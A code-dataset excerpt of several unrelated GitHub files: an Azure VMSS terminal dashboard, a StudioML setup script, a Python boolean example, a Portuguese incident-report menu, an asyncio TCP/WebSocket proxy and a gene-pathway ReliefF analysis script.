\", 6, 0);\n\t\t\tupdate_panels();\n\t\t\tdoupdate();\n\t\t\t# sleep before each loop to avoid throttling...\n\t\t\ttime.sleep(interval);\n\t\texcept:\n\t\t\tlogging.exception(\"Getting VMSS Information...\")\n\t\t\twrite_str(window_information['error'], 1, 24, \"Let's sleep for 30 seconds and try to refresh the dashboard again...\");\n\t\t\tshow_panel(panel_information['error']);\n\t\t\tupdate_panels();\n\t\t\tdoupdate();\n\t\t\t## break out of loop when an error is encountered\n\t\t\t#break\n\t\t\ttime.sleep(30);\n\t\t\thide_panel(panel_information['error']);\n\ndef get_cmd(access_token, run_event, window_information, panel_information):\n\tglobal key, rgname, vmssname, vm_selected, quit;\n\t\n\twin_help = 0; win_log = 0; win_insightsone = 0; win_insightstwo = 0;\n\tlock = threading.Lock()\n\twhile (run_event.is_set() and quit == 0):\n\t\twith lock:\n\t\t\tkey = getch();\n\t\tif (key == 58):\n\t\t\tcurs_set(True);\n\t\t\techo();\n\t\t\t#Clear the old command from our prompt line...\n\t\t\twmove(window_information['cmd'], 1, 5); wclrtoeol(window_information['cmd']);\n\t\t\tcreate_prompt_form(window_information['cmd']);\n\n\t\t\t#Home...\n\t\t\tourhome = platform.system();\n\n\t\t\t#Read the command...\n\t\t\tinputcommand = mvwgetstr(window_information['cmd'], 1, 5);\n\t\t\tif (ourhome == 
'Windows'):\n\t\t\t\tcommand = inputcommand;\n\t\t\telse:\n\t\t\t\tcommand = inputcommand.decode('utf-8');\n\n\t\t\tcurs_set(False);\n\t\t\tnoecho();\n\t\t\tcreate_prompt_form(window_information['cmd']);\n\n\t\t\tcor=6;\n\t\t\tif (command == \"help\"):\n\t\t\t\tif (win_help):\n\t\t\t\t\thide_panel(panel_information['help']);\n\t\t\t\t\twin_help = 0;\n\t\t\t\telse:\n\t\t\t\t\tshow_panel(panel_information['help']);\n\t\t\t\t\twin_help = 1;\n\t\t\telif (command == \"debug\"):\n\t\t\t\tif (win_log and win_insightsone and win_insightstwo):\n\t\t\t\t\thide_panel(panel_information['log']);\n\t\t\t\t\thide_panel(panel_information['insightsone']);\n\t\t\t\t\thide_panel(panel_information['insightstwo']);\n\t\t\t\t\twin_log = 0; win_insightsone = 0; win_insightstwo = 0; \n\t\t\t\telse:\n\t\t\t\t\tshow_panel(panel_information['log']);\n\t\t\t\t\tshow_panel(panel_information['insightsone']);\n\t\t\t\t\tshow_panel(panel_information['insightstwo']);\n\t\t\t\t\twin_log = 1; win_insightsone = 1; win_insightstwo = 1;\n\t\t\telif (command == \"log\"):\n\t\t\t\tif (win_log):\n\t\t\t\t\thide_panel(panel_information['log']);\n\t\t\t\t\twin_log = 0;\n\t\t\t\telse:\n\t\t\t\t\tshow_panel(panel_information['log']);\n\t\t\t\t\twin_log = 1;\n\t\t\telif (command == \"insights\"):\n\t\t\t\tif (win_insightsone and win_insightstwo):\n\t\t\t\t\thide_panel(panel_information['insightsone']);\n\t\t\t\t\thide_panel(panel_information['insightstwo']);\n\t\t\t\t\twin_insightsone = 0; win_insightstwo = 0;\n\t\t\t\telse:\n\t\t\t\t\tshow_panel(panel_information['insightsone']);\n\t\t\t\t\tshow_panel(panel_information['insightstwo']);\n\t\t\t\t\twin_insightsone = 1; win_insightstwo = 1;\n\t\t\telif (command == \"insights 1\"):\n\t\t\t\tif (win_insightsone):\n\t\t\t\t\thide_panel(panel_information['insightsone']);\n\t\t\t\t\twin_insightsone = 0;\n\t\t\t\telse:\n\t\t\t\t\tshow_panel(panel_information['insightsone']);\n\t\t\t\t\twin_insightsone = 1;\n\t\t\telif (command == \"insights 2\"):\n\t\t\t\tif (win_insightstwo):\n\t\t\t\t\thide_panel(panel_information['insightstwo']);\n\t\t\t\t\twin_insightstwo = 0;\n\t\t\t\telse:\n\t\t\t\t\tshow_panel(panel_information['insightstwo']);\n\t\t\t\t\twin_insightstwo = 1;\n\t\t\telif (command == \"quit\" or command == 'exit'):\n\t\t\t\tquit = 1;\n\t\t\telif (command == \"deselect\"):\n\t\t\t\tvm_selected[1] = 999998;\n\t\t\t\thide_panel(panel_information['vm']);\n\t\t\telse:\n\t\t\t\tcmd_status = exec_cmd(window_information, access_token, capacity, command);\n\t\t\t\tif (cmd_status == 1): cor = 8;\n\t\t\t\tif (cmd_status == 2): cor = 4;\n\t\t\t\tif (cmd_status == 3): cor = 7;\n\t\t\t\tif (cmd_status == 4): cor = 3;\n\t\t\twrite_str_color(window_information['cmd'], 1, 125, \"E\", cor, 1);\n\t\t\tupdate_panels();\n\t\t\tdoupdate();\n\ndef insights_in_window(log, window, run_event):\n\tglobal insights_flag, insightsOneUrl, insightsTwoUrl;\n\n\tlock = threading.Lock()\n\n\ttotal_values_one = 87; total_values_two = 71;\n\t#x, y = getmaxyx(window['insightsone']);\n\t#a, b = getmaxyx(window['insightstwo']);\n\tvalues_insightsone = []; values_insightstwo = [];\n\tindex_one = 0; index_two = 0;\n\n\twhile (run_event.is_set() and quit == 0):\n\t\t#Clean the graph area...\n\t\tflag = 0;\n\t\t#If the user changed the RG and VMSS we need to set the 'flag' before calling the graph routine...\n\t\tif (insights_flag): \n\t\t\tflag = 1;\n\t\t\tinsights_flag = 0;\n\t\t\tvalues_insightsone = []; values_insightstwo = [];\n\t\t\tindex_one = 0; index_two = 0;\n\n\t\t#Get the Insights metrics and draw 
graph...\n\t\tcustomheader = {'X-Api-Key': insightsKey}\n\t\tif (insightsOneEnabled.lower() == \"yes\"):\n\t\t\tclean_insights(window['insightsone'], 10);\n\t\t\t#Open space to a new sample...\n\t\t\tvalues_insightsone.append(index_one);\n\t\t\ttry:\n\t\t\t\tif (insightsOneUrl == \"\"):\n\t\t\t\t\tinsightsOneUrl = insightsUrl + insightsAppId + \"/metrics/\" + insightsOneMetric + \"?timespan=PT\" + str(insightsInterval) + \"S\";\n\n\t\t\t\tmetricone = requests.get(insightsOneUrl, headers=customheader);\n\t\t\t\tmetriconevalue = metricone.json();\n\t\t\t\tif (metriconevalue['value'][insightsOneMetric].values()[-1] is not None):\n\t\t\t\t\tvalues_insightsone[index_one] = int(metriconevalue['value'][insightsOneMetric].values()[-1]);\n\t\t\t\telse:\n\t\t\t\t\tvalues_insightsone[index_one] = 0;\n\t\t\t\tlogging.info(\"INSIGHTS %s: %s\", insightsOneTitle, values_insightsone[index_one]);\n\t\t\t\tif (index_one == total_values_one):\n\t\t\t\t\tvalues_insightsone.pop(0);\n\t\t\t\t\tindex_one = (total_values_one - 1);\n\t\t\t\tindex_one += 1;\n\t\t\t\tdraw_insights(window['insightsone'], values_insightsone, insightsOneTitle, \"One\", flag);\n\t\t\texcept:\n\t\t\t\tlogging.exception(\"Getting Insights Metric: %s\", insightsOneTitle);\n\n\t\tif (insightsTwoEnabled.lower() == \"yes\"):\n\t\t\tclean_insights(window['insightstwo'], 7);\n\t\t\t#Open space to a new sample...\n\t\t\tvalues_insightstwo.append(index_two);\n\t\t\ttry:\n\t\t\t\tif (insightsTwoUrl == \"\"):\n\t\t\t\t\tinsightsTwoUrl = insightsUrl + insightsAppId + \"/metrics/\" + insightsTwoMetric + \"?timespan=PT\" + str(insightsInterval) + \"S\";\n\n\t\t\t\tmetrictwo = requests.get(insightsTwoUrl, headers=customheader);\n\t\t\t\tmetrictwovalue = metrictwo.json();\n\t\t\t\tif (metrictwovalue['value'][insightsTwoMetric].values()[-1] is not None):\n\t\t\t\t\tvalues_insightstwo[index_two] = int(metrictwovalue['value'][insightsTwoMetric].values()[-1]);\n\t\t\t\telse:\n\t\t\t\t\tvalues_insightstwo[index_two] = 0;\n\t\t\t\tlogging.info(\"INSIGHTS %s: %s\", insightsTwoTitle, values_insightstwo[index_two]);\n\t\t\t\tif (index_two == total_values_two):\n\t\t\t\t\tvalues_insightstwo.pop(0);\n\t\t\t\t\tindex_two = (total_values_two - 1);\n\t\t\t\tindex_two += 1;\n\t\t\t\tdraw_insights(window['insightstwo'], values_insightstwo, insightsTwoTitle, \"Two\", flag);\n\t\t\texcept:\n\t\t\t\tlogging.exception(\"Getting Insights Metric: %s\", insightsTwoTitle);\n\n\t\t#Sleep a little...\n\t\tupdate_panels();\n\t\tdoupdate();\n\t\ttime.sleep(insightsInterval);\n\ndef vmss_monitor_thread(window_information, panel_information, window_continents, panel_continents):\n\tglobal access_token, insightsOneEnabled, insightsTwoEnabled;\n\n\trun_event = threading.Event()\n\trun_event.set()\n\n\t# start a timer in order to refresh the access token in 10 minutes\n\tstart_time = time.time();\n\n\t# get an access token for Azure authentication\n\taccess_token = azurerm.get_access_token(str(tenant_id), str(app_id), str(app_secret));\n\n\t# ---= ASCii Dashboard THREADS =---\n\t# Logtail Thread...\n\tlog_thread = threading.Thread(target=tail_in_window, args=(logName, window_information['log'], panel_information['log'], run_event))\n\tlog_thread.start()\n\n\t# VMSS Monitoring Thread...\n\tvmss_thread = threading.Thread(target=get_vmss_properties, args=(access_token, run_event, window_information, panel_information, window_continents, panel_continents))\n\tvmss_thread.start()\n\n\t# start a CMD Interpreter thread\n\tcmd_thread = threading.Thread(target=get_cmd, args=(access_token, 
run_event, window_information, panel_information))\n\tcmd_thread.start()\n\n\t#Simple consistent check for the Insights configuration...\n\tif (insightsOneEnabled.lower() == \"yes\"):\n\t\tif ((insightsOneUrl == \"\" and insightsUrl == \"\") or (insightsOneTitle == \"\") or (insightsOneMetric == \"\")):\n\t\t\tlogging.warning(\"Configuration for insightsOne Graph is inconsistent. You need to configure insightsUrl or insightsOneUrl AND insightsOneTitle AND insightsOneMetric\");\n\t\t\tinsightsOneEnabled = \"No\";\n\n\tif (insightsTwoEnabled.lower() == \"yes\"):\n\t\tif ((insightsTwoUrl == \"\" and insightsUrl == \"\") or (insightsTwoTitle == \"\") or (insightsTwoMetric == \"\")):\n\t\t\tlogging.warning(\"Configuration for InsightsTwo Graph is inconsistent. You need to configure insightsUrl or insightsTwoUrl AND insightsTwoTitle AND insightsTwoMetric\");\n\t\t\tinsightsTwoEnabled = \"No\";\n\n\t# Insights Thread...\n\tif (insightsOneEnabled.lower() == \"yes\" or insightsTwoEnabled.lower() == \"yes\"):\n\t\tinsights_thread = threading.Thread(target=insights_in_window, args=(logName, window_information, run_event))\n\t\tinsights_thread.start()\n\n\ttime.sleep(.2);\n\n\ttry:\n\t\twhile (quit == 0):\n\t\t\ttime.sleep(.1);\n\t\tif (quit == 1):\n\t\t\traise KeyboardInterrupt\n\texcept KeyboardInterrupt:\n\t\tshow_panel(panel_information['exit']);\n\t\tupdate_panels();\n\t\tdoupdate();\n\t\trun_event.clear();\n\t\tlog_thread.join();\n\t\tvmss_thread.join();\n\t\tcmd_thread.join();\n\t\tif (insightsOneEnabled.lower() == \"yes\" or insightsTwoEnabled.lower() == \"yes\"):\n\t\t\tinsights_thread.join();\n\t\twmove(window_information['exit'], 3, 5); wclrtoeol(window_information['exit']);\n\t\tbox(window_information['exit']);\n\t\twrite_str_color(window_information['exit'], 3, 6, \"Console Update threads successfully closed.\", 4, 1);\n\t\tupdate_panels();\n\t\tdoupdate();\n","repo_name":"code2exe/asciivmssdashboard","sub_path":"includes/azure.py","file_name":"azure.py","file_ext":"py","file_size_in_byte":29105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"44"} +{"seq_id":"34909876851","text":"import os\nimport shutil\nimport sys\nfrom setuptools import setup, find_packages\nfrom subprocess import call\nfrom setuptools.command.install import install\nfrom setuptools.command.develop import develop\n\nimport pkg_resources\n\nimport sys\nimport platform\nimport ctypes\nimport pip\n\n# **Python version check**\n#\n# This check is also made in IPython/__init__, don't forget to update both when\n# changing Python version requirements.\nif sys.version_info < (3, 8):\n pip_message = 'This may be due to an out of date pip. Make sure you have pip >= 9.0.1.'\n try:\n import pip\n pip_version = tuple([int(x) for x in pip.__version__.split('.')[:3]])\n if pip_version < (9, 0, 1) :\n pip_message = 'Your pip version is out of date, please install pip >= 9.0.1. 
'\\\n 'pip {} detected.'.format(pip.__version__)\n else:\n # pip is new enough - it must be something else\n pip_message = ''\n except Exception:\n pass\n\n\n error = \"\"\"\nIPython 7.0+ supports Python 3.4 and above.\nWhen using Python 2.7, please install IPython 5.x LTS Long Term Support version.\nPython 3.3 was supported up to IPython 6.x.\nSee IPython `README.rst` file for more information:\n https://github.com/ipython/ipython/blob/master/README.rst\nPython {py} detected.\n{pip}\n\"\"\".format(py=sys.version_info, pip=pip_message )\n\n print(error)\n sys.exit(1)\n\ndef read(fname):\n try:\n with open(os.path.join(os.path.dirname(__file__), fname)) as f:\n data = f.read()\n return data\n except BaseException:\n return None\n\n\ndef local_scheme(version):\n if version.distance and version.distance > 0:\n return '.post' + str(version.distance)\n else:\n return ''\n\n\ndef version_scheme(version):\n return str(version.tag)\n\n\nsys.path.append('studio/')\n# This file contains metadata related to the studioml client and python base\n# server software\n\n\nclass MyDevelop(develop):\n def run(self):\n call([\"pip install -r requirements-cs.txt --no-clean\"], shell=True)\n copyconfig()\n develop.run(self)\n\n\nclass MyInstall(install):\n\n def run(self):\n call([\"pip install -r requirements-cs.txt --no-clean\"], shell=True)\n copyconfig()\n install.run(self)\n\n\ndef copyconfig():\n config_path = os.path.expanduser('~/.studioml/config.yaml')\n default_config_path = os.path.join(\n os.path.dirname(os.path.realpath(__file__)),\n \"studio/default_config.yaml\")\n\n if not os.path.exists(config_path):\n if not os.path.exists(os.path.dirname(config_path)):\n os.makedirs(os.path.dirname(config_path))\n\n shutil.copyfile(\n default_config_path,\n os.path.expanduser('~/.studioml/config.yaml'))\n\n\nwith open('requirements-cs.txt') as f:\n required = f.read().splitlines()\n\nwith open('test_requirements-cs.txt') as f:\n test_required = f.read().splitlines()\n\n# Directly list packages we want to be included\ncs_packages = ['studio.artifacts',\n 'studio.util',\n 'studio.experiments',\n 'studio.storage',\n 'studio.dependencies_policies',\n 'studio.queues',\n 'studio.db_providers',\n 'studio.payload_builders',\n 'studio.credentials']\n\nsetup(\n name='studioml-cs',\n description='Base packages for StudioML functionality',\n packages=cs_packages,\n long_description=read('README.rst'),\n url='https://github.com/studioml/studio',\n license='Apache License, Version 2.0',\n keywords='studioml StudioML Studio',\n author='Andrei Denissov',\n author_email='andrei.denissov@gmail.com',\n data_files=[('test_requirements-cs.txt')],\n scripts=['studio/scripts/studio-local-worker'],\n test_suite='nose.collector',\n tests_require=test_required,\n use_scm_version={\n \"version_scheme\": version_scheme,\n \"local_scheme\": local_scheme},\n python_requires='>=3.8',\n setup_requires=['setuptools_scm', 'setuptools_scm_git_archive'],\n cmdclass={'develop': MyDevelop, 'install': MyInstall},\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"Environment :: Console\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: Science/Research\",\n \"Operating System :: POSIX :: Linux\",\n \"Programming Language :: Python :: 3.8\",\n \"Topic :: Scientific/Engineering :: Artificial Intelligence\",\n \"Topic :: Utilities\",\n \"License :: OSI Approved :: Apache Software License\",\n ],\n install_requires=required,\n include_package_data=True,\n 
zip_safe=False)\n","repo_name":"studioml/studio","sub_path":"setup-cs.py","file_name":"setup-cs.py","file_ext":"py","file_size_in_byte":4620,"program_lang":"python","lang":"en","doc_type":"code","stars":376,"dataset":"github-code","pt":"44"} +{"seq_id":"43241333999","text":"# if apllication has high income AND good credit eligible for loan\n#AND both condition are must be true\n# OR at list one condition must be true\n# NOT any boolean value true\nfrom re import T\n\n\nhas_high_income=False\nhas_good_income=True\n\nif has_high_income and has_good_income:\n print(\"elgible for loan\")\nelse:\n print(\"not elgible for loan\")","repo_name":"premkumar4461/pythncode","sub_path":"logicalOP.py","file_name":"logicalOP.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"71631922052","text":"from Models.Ocorrencia import Ocorrencia\nfrom Telas.Tela import Tela,criarOpcoe\nfrom Telas.Ocorrencias.minhasOcorrencias import criarTelaMinhasOcorrencias\nfrom Telas.Ocorrencias.ocorrenciasProximas import criarTelaOcorrenciasProximas\nfrom opcoes import tiposOcorrencia,subtiposOcorrenciaCriminal,subtiposOcorrenciaCriminalValues,subtiposOcorrenciaEstrutural,subtiposOcorrenciaEstruturalValues,terminalSelect\nimport credenciais\n\ndef mostrarOcorrenciasProximas():\n ocorrenciasProximas = criarTelaOcorrenciasProximas()\n ocorrenciasProximas.show()\n\ndef mostrarMinhasOcorrencias():\n reloadMinhasOcorrencias = [True]\n\n while(reloadMinhasOcorrencias[0]):\n reloadMinhasOcorrencias[0] = False\n minhasOcorrencias = criarTelaMinhasOcorrencias(reloadMinhasOcorrencias) \n minhasOcorrencias.show()\n\ndef criarOcorrencia():\n \n latitude = None\n while(True):\n try:\n latitude = input(\"Latitude: \")\n latitude = str(float(latitude))\n\n break\n except:\n print(\"Latitude invalida.\")\n continue\n longitude = None\n while(True):\n try:\n longitude = input(\"Longitude: \")\n longitude = str(float(longitude))\n \n break\n\n except:\n print(\"Longitude invalida.\")\n continue\n \n \n print('----Tipo----')\n tipo = terminalSelect(tiposOcorrencia,None,False)\n print('----Subtipo----')\n if(tipo == 0):\n subtipo = terminalSelect(subtiposOcorrenciaCriminal,subtiposOcorrenciaCriminalValues,False)\n if(tipo == 1):\n subtipo = terminalSelect(subtiposOcorrenciaEstrutural,subtiposOcorrenciaEstruturalValues,False)\n descricao = input(\"Descricao: \")\n \n if(Ocorrencia.criar(latitude,longitude,tipo,subtipo,descricao,credenciais.usuario.toArray()[\"CPF\"])):\n print(\"Ocorrencia criada com sucesso!\")\n else:\n print(\"Algo deu errado na criacao da ocorrencia! 
Verifique sua conexao com a internet.\")\n print(\"Se o problema persistir, tente reiniciar o programa.\")\n\n\n\n \n\nopcoes = [ \n criarOpcoe('Ver ocorrencias proximas', mostrarOcorrenciasProximas), \n criarOpcoe('Minhas ocorrencias',mostrarMinhasOcorrencias),\n criarOpcoe('Criar ocorrencia',criarOcorrencia),\n ]\nback = criarOpcoe('Voltar')\n\n\nmenuOcorrencia = Tela(opcoes,back)","repo_name":"LucasGranela/community","sub_path":"Telas/Ocorrencias/menuOcorrencia.py","file_name":"menuOcorrencia.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"12550717900","text":"from asyncio import open_connection, wait_for, sleep as async_sleep\nfrom websockets import connect\nfrom typing import Union\n\nfrom .connections import (\n ConnectionFactory,\n CONNECTION\n)\nfrom .constants import (\n CONNECTION_TYPE_TCP,\n CONNECTION_TYPE_WEBSOCKET,\n MIN_TIMEOUT\n)\n\n\n__author__ = 'Sergio Ivanuzzo'\n__license__ = 'Apache 2.0'\n__copyright__ = 'Copyright 2021, Idewavecore'\n\n\nclass BaseProxy:\n __slots__ = ('host', 'port', 'connection')\n\n def __init__(self, host: str, port: int):\n self.host = host\n self.port = port\n self.connection: Union[CONNECTION, None] = None\n\n async def connect(self):\n ...\n\n async def read(self, *args, **kwargs):\n ...\n\n async def write(self, *args, **kwargs):\n ...\n\n\nclass TCPProxy(BaseProxy):\n async def connect(self) -> None:\n reader, writer = await open_connection(self.host, self.port)\n self.connection = ConnectionFactory(CONNECTION_TYPE_TCP)\\\n .get_connection(reader, writer)\n\n async def read(self, amount: int) -> bytes:\n response = b''\n\n while True:\n data = await wait_for(\n self.connection.reader.read(amount),\n timeout=MIN_TIMEOUT\n )\n if not data:\n break\n\n response += data\n\n await async_sleep(MIN_TIMEOUT)\n\n return response\n\n async def write(self, request: bytes):\n self.connection.writer.write(request)\n await self.connection.writer.drain()\n\n\nclass WebsocketProxy(BaseProxy):\n async def connect(self) -> None:\n path: str = f'wss://{self.host}:{self.port}'\n websocket = await connect(path)\n self.connection = ConnectionFactory(CONNECTION_TYPE_WEBSOCKET)\\\n .get_connection(websocket, path)\n\n async def read(self) -> bytes:\n response: bytes = await self.connection.websocket.recv()\n return response\n\n async def write(self, request: bytes):\n await self.connection.websocket.send(request)\n\n\nclass ProxyFactory:\n def __init__(self, connection_type: str):\n self.connection_type = connection_type\n\n def get_proxy(self, *args, **kwargs):\n if self.connection_type == CONNECTION_TYPE_TCP:\n return TCPProxy(*args, **kwargs)\n elif self.connection_type == CONNECTION_TYPE_WEBSOCKET:\n return WebsocketProxy(*args, **kwargs)\n\n raise ValueError(f'Incorrect connection_type: \"{self.connection_type}\"')\n","repo_name":"idewave/idewavecore","sub_path":"idewavecore/network/proxies.py","file_name":"proxies.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"44"} +{"seq_id":"70041971973","text":"\n\nimport subprocess\nimport dataprocess\nimport CoexpressionDB\nimport sys\nimport os\nimport statistics \nfrom skrebate import ReliefF\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom multiprocessing import Process\nfrom os import system\n\n\n\ndef getCoexpressionGene(genename,Coexpresslist):\n Coexpressionlist= 
[]\n for genepair in Coexpresslist:\n if genepair[\"gene1\"] == genename and not genepair[\"gene2\"] in Coexpressionlist:\n Coexpressionlist.append(genepair[\"gene2\"])\n elif genepair[\"gene2\"] == genename and not genepair[\"gene1\"] in Coexpressionlist:\n Coexpressionlist.append(genepair[\"gene1\"])\n \n return Coexpressionlist\n \n\n\n\n\n\ndef generateRouteAndCoexpressionfileDown(datafileexpresionfilepath, PathwayRoutefilepath,CoexpressionDir,subgroupdir,subgroupnumber,accuvaluethreshold,importancethreshold):\n accuvaluethreshold = int(accuvaluethreshold*subgroupnumber)\n # l = []\n # hunman\n biogridfilepath = \"C:/Users/whl19/Documents/Code/GenebetweenPathways/CoexpressionDB/BiogridDB/BIOGRID-ORGANISM-Homo_sapiens-4.2.192.tab3.txt\"\n Stringlinkfilepath = \"C:/Users/whl19/Documents/Code/GenebetweenPathways/CoexpressionDB/StringDB/Homo sampines/9606.protein.links.v11.0.txt\"\n Stringinfofilepath = \"C:/Users/whl19/Documents/Code/GenebetweenPathways/CoexpressionDB/StringDB/Homo sampines/9606.protein.info.v11.0.txt\"\n # mouse\n # biogridfilepath = \"C:/Users/whl19/Documents/Code/GenebetweenPathways/CoexpressionDB/BiogridDB/BIOGRID-ORGANISM-Mus_musculus-4.2.192.tab3.txt\"\n # Stringlinkfilepath = \"C:/Users/whl19/Documents/Code/GenebetweenPathways/CoexpressionDB/StringDB/Mus musculus/10090.protein.links.v11.0.txt\"\n # Stringinfofilepath = \"C:/Users/whl19/Documents/Code/GenebetweenPathways/CoexpressionDB/StringDB/Mus musculus/10090.protein.info.v11.0.txt\"\n\n\n\n Coexpresslist1 = CoexpressionDB.loadfileBiogrid(biogridfilepath)\n Coexpresslist2 = CoexpressionDB.loadfileString(Stringlinkfilepath,Stringinfofilepath)\n Coexpresslist = CoexpressionDB.combinetwodb(Coexpresslist1,Coexpresslist2)\n\n\n # # # using php to generate Scoreing first\n # print('C:/wamp64/bin/php/php5.6.40/php.exe', 'C:/Users/whl19/Documents/Code/GenebetweenPathways/pathwayscoreUtilies/score_pathways_cli.php',datafileexpresionfilepath,PathwayRoutefilepath)\n\n # # sys.exit()\n # if you want output\n result = subprocess.run(\n ['C:/wamp64/bin/php/php5.6.40/php.exe', 'C:/Users/whl19/Documents/Code/GenebetweenPathways/pathwayscoreUtilies/score_pathways_cli.php',datafileexpresionfilepath,PathwayRoutefilepath], # program and arguments\n stdout=subprocess.PIPE, # capture stdout\n check=False # raise exception if program fails\n ) \n\n # # sys.exit()\n\n expressiondata = dataprocess.loadfilematrix(datafileexpresionfilepath)\n\n\n with open(PathwayRoutefilepath,\"r\") as PathwayRoutefile:\n for line in PathwayRoutefile.readlines():\n linedata = line.strip().split(\"\\t\")\n if \"~p2~\" in linedata[1]:\n Secondline = linedata[1].replace(\"/\",\"\").split(\"~\")\n Sourcelist = Secondline[3].split(\",\")\n Sourceid = linedata[0].split(\"~\")[2]\n Targetlist = Secondline[5].split(\",\")\n Targetid = linedata[0].split(\"~\")[3]\n # Contains= linedata[1].split(\"~p2~\")[1].split(\",\")\n Coexpressionlist = []\n for genename in Sourcelist:\n dbselectlist = getCoexpressionGene(genename,Coexpresslist)\n Coexpressionlist=list(set(Coexpressionlist).union(set(dbselectlist)))\n \n with open(CoexpressionDir+linedata[1].split(\"~p2~\")[0]+\"_\"+Secondline[3]+\"_\"+Sourceid+\"_\"+Targetid+\".txt\",\"w\") as smallfile:\n title = \"Samplename\"\n for i in range(2,len(linedata)):\n title+=\"\\tS\"+str(i-1)\n smallfile.write(title+\"\\n\")\n\n p2line =\"p2\"\n for i in range(2,len(linedata)):\n p2line+=\"\\t\"+str(linedata[i]) \n smallfile.write(p2line+\"\\n\") \n for genename in Coexpressionlist :\n if genename in expressiondata.keys() and 
not genename in Sourcelist and not genename in Targetlist:\n pline = genename\n for value in expressiondata[genename]:\n pline+=\"\\t\"+str(value) \n smallfile.write(pline+\"\\n\")\n # do sub group\n dirname = linedata[1].split(\"~p2~\")[0]+\"_\"+Secondline[3]+\"_\"+Sourceid+\"_\"+Targetid\n handleAroute(subgroupnumber,dirname,CoexpressionDir,subgroupdir,accuvaluethreshold,importancethreshold)\n \n\n\ndef handleAroute(subgroupnumber,dirname,CoexpressionDir,subgroupdir,accuvaluethreshold,importancethreshold):\n print(subgroupdir+dirname)\n dataprocess.randomdatasplit(subgroupnumber,CoexpressionDir+dirname+\".txt\",subgroupdir+dirname+\"/\")\n Reliffeatureselection(subgroupnumber,subgroupdir+dirname+\"/\",\"p2\") \n Findcorrectgene(\"P2\",subgroupdir+dirname+\"/result/\",subgroupdir+dirname+\"/analy/\",accuvaluethreshold,isreg=False,ascend=True,toprate=importancethreshold)\n \n\n\n\ndef processRelif(index,datadir,targetgene):\n # print(index) \n genetic_data = pd.read_csv(datadir+str(index)+'_test.txt', sep='\\t')\n \n features, labels = genetic_data.drop(targetgene, axis=1).values, genetic_data[targetgene].values\n # Make sure to compute the feature importance scores from only your training set\n X_train, X_test, y_train, y_test = train_test_split(features, labels)\n fs = ReliefF()\n fs.fit(X_train, y_train)\n with open(datadir+\"/result/\"+str(index)+\"_result.txt\",\"w\") as resultfile:\n for feature_name, feature_score in zip(genetic_data.drop(targetgene, axis=1).columns,fs.feature_importances_):\n resultfile.write(feature_name+'\\t'+targetgene+'\\t'+str(feature_score)+\"\\n\")\n\n\ndef Reliffeatureselection(totalsubgroup,datadir,targetgene):\n l=[]\n targetgene = targetgene.upper()\n for index in range(totalsubgroup):\n # processRelif(index,datadir,targetgene)\n p = Process(target = processRelif,args=(index,datadir,targetgene))\n p.start()\n l.append(p) \n \n for p in l :\n p.join() \n\n # print(index) \n # genetic_data = pd.read_csv(datadir+str(index)+'_test.txt', sep='\\t')\n \n # features, labels = genetic_data.drop(targetgene, axis=1).values, genetic_data[targetgene].values\n # # Make sure to compute the feature importance scores from only your training set\n # X_train, X_test, y_train, y_test = train_test_split(features, labels)\n # fs = ReliefF()\n # fs.fit(X_train, y_train)\n # with open(datadir+\"/result/\"+str(index)+\"_result.txt\",\"w\") as resultfile:\n # for feature_name, feature_score in zip(genetic_data.drop(targetgene, axis=1).columns,fs.feature_importances_):\n # resultfile.write(feature_name+'\\t'+targetgene+'\\t'+str(feature_score)+\"\\n\")\n\ndef Findcorrectgene(findname,dirpath,resultpath,accuvaluethreshold,isreg=False,ascend=True,toprate=0.1):\n g = os.walk(dirpath) \n resultslist=[]\n for path,dir_list,file_list in g: \n for file_name in file_list:\n testresult = {}\n addlist = []\n with open(os.path.join(path, file_name),\"r\") as resultfile:\n for line in resultfile.readlines():\n linedata = line.strip().split(\"\\t\")\n TF = linedata[0].upper()\n\n target = linedata[1].upper()\n \n weight = float(linedata[2].upper())\n if isreg:\n if TF == findname:\n testresult[target] = weight\n else:\n if target == findname:\n testresult[TF] = weight\n\n testresult={k: v for k, v in sorted(testresult.items(), key=lambda item: item[1],reverse=ascend)}\n accpectnum = toprate*len(testresult)\n for key,valueweight in testresult.items():\n accpectnum-=1\n if accpectnum>=0:\n addlist.append(key) \n resultslist.append(addlist)\n selectgene ={}\n for addedlist in resultslist:\n for 
genename in addedlist:\n if genename not in selectgene.keys():\n selectgene[genename]=1\n else:\n selectgene[genename]+=1\n if isreg:\n filename = findname+\"_target.txt\"\n wastefilename = findname+\"_targetwaste.txt\"\n else:\n filename = findname+\"_regulator.txt\"\n wastefilename = findname+\"_regulatorwaste.txt\"\n with open(resultpath+filename,\"w\")as resultouputfile:\n with open(resultpath+wastefilename,\"w\")as resultouputwastefile:\n for genenamekey,accuvalue in selectgene.items():\n if accuvalue>= accuvaluethreshold:\n resultouputfile.write(genenamekey+\"\\t\"+str(accuvalue)+\"\\n\")\n resultouputwastefile.write(genenamekey+\"\\t\"+str(accuvalue)+\"\\n\")\n else:\n resultouputwastefile.write(genenamekey+\"\\t\"+str(accuvalue)+\"\\n\")\n\n\n\n# if __name__ == '__main__':\n\n # importancethreshold = 0.1\n # subgouppercentage = 0.7\n # subgroupnumber = 10\n # inputtable = \"C:/Users/whl19/Documents/Code/GenebetweenPathways/DataMaterial/Cancer_data/TCGA_SKCM/TCGA_SKCM_log2ratio.txt\"\n # outputtable = \"C:/Users/whl19/Documents/Code/GenebetweenPathways/Resultcombine/2-27-2021/TCGA_SKCM_RouteScore.txt\"\n # CoexpressionDir = \"C:/Users/whl19/Documents/Code/GenebetweenPathways/Resultcombine/2-28-2021/CoexpressionDir/\"\n # subgroupdir = \"C:/Users/whl19/Documents/Code/GenebetweenPathways/Resultcombine/2-28-2021/CoexpressionSubgroup/\"\n # generateRouteAndCoexpressionfileDown(inputtable, outputtable,CoexpressionDir,subgroupdir,subgroupnumber,subgouppercentage,importancethreshold)\n \n # datadir= 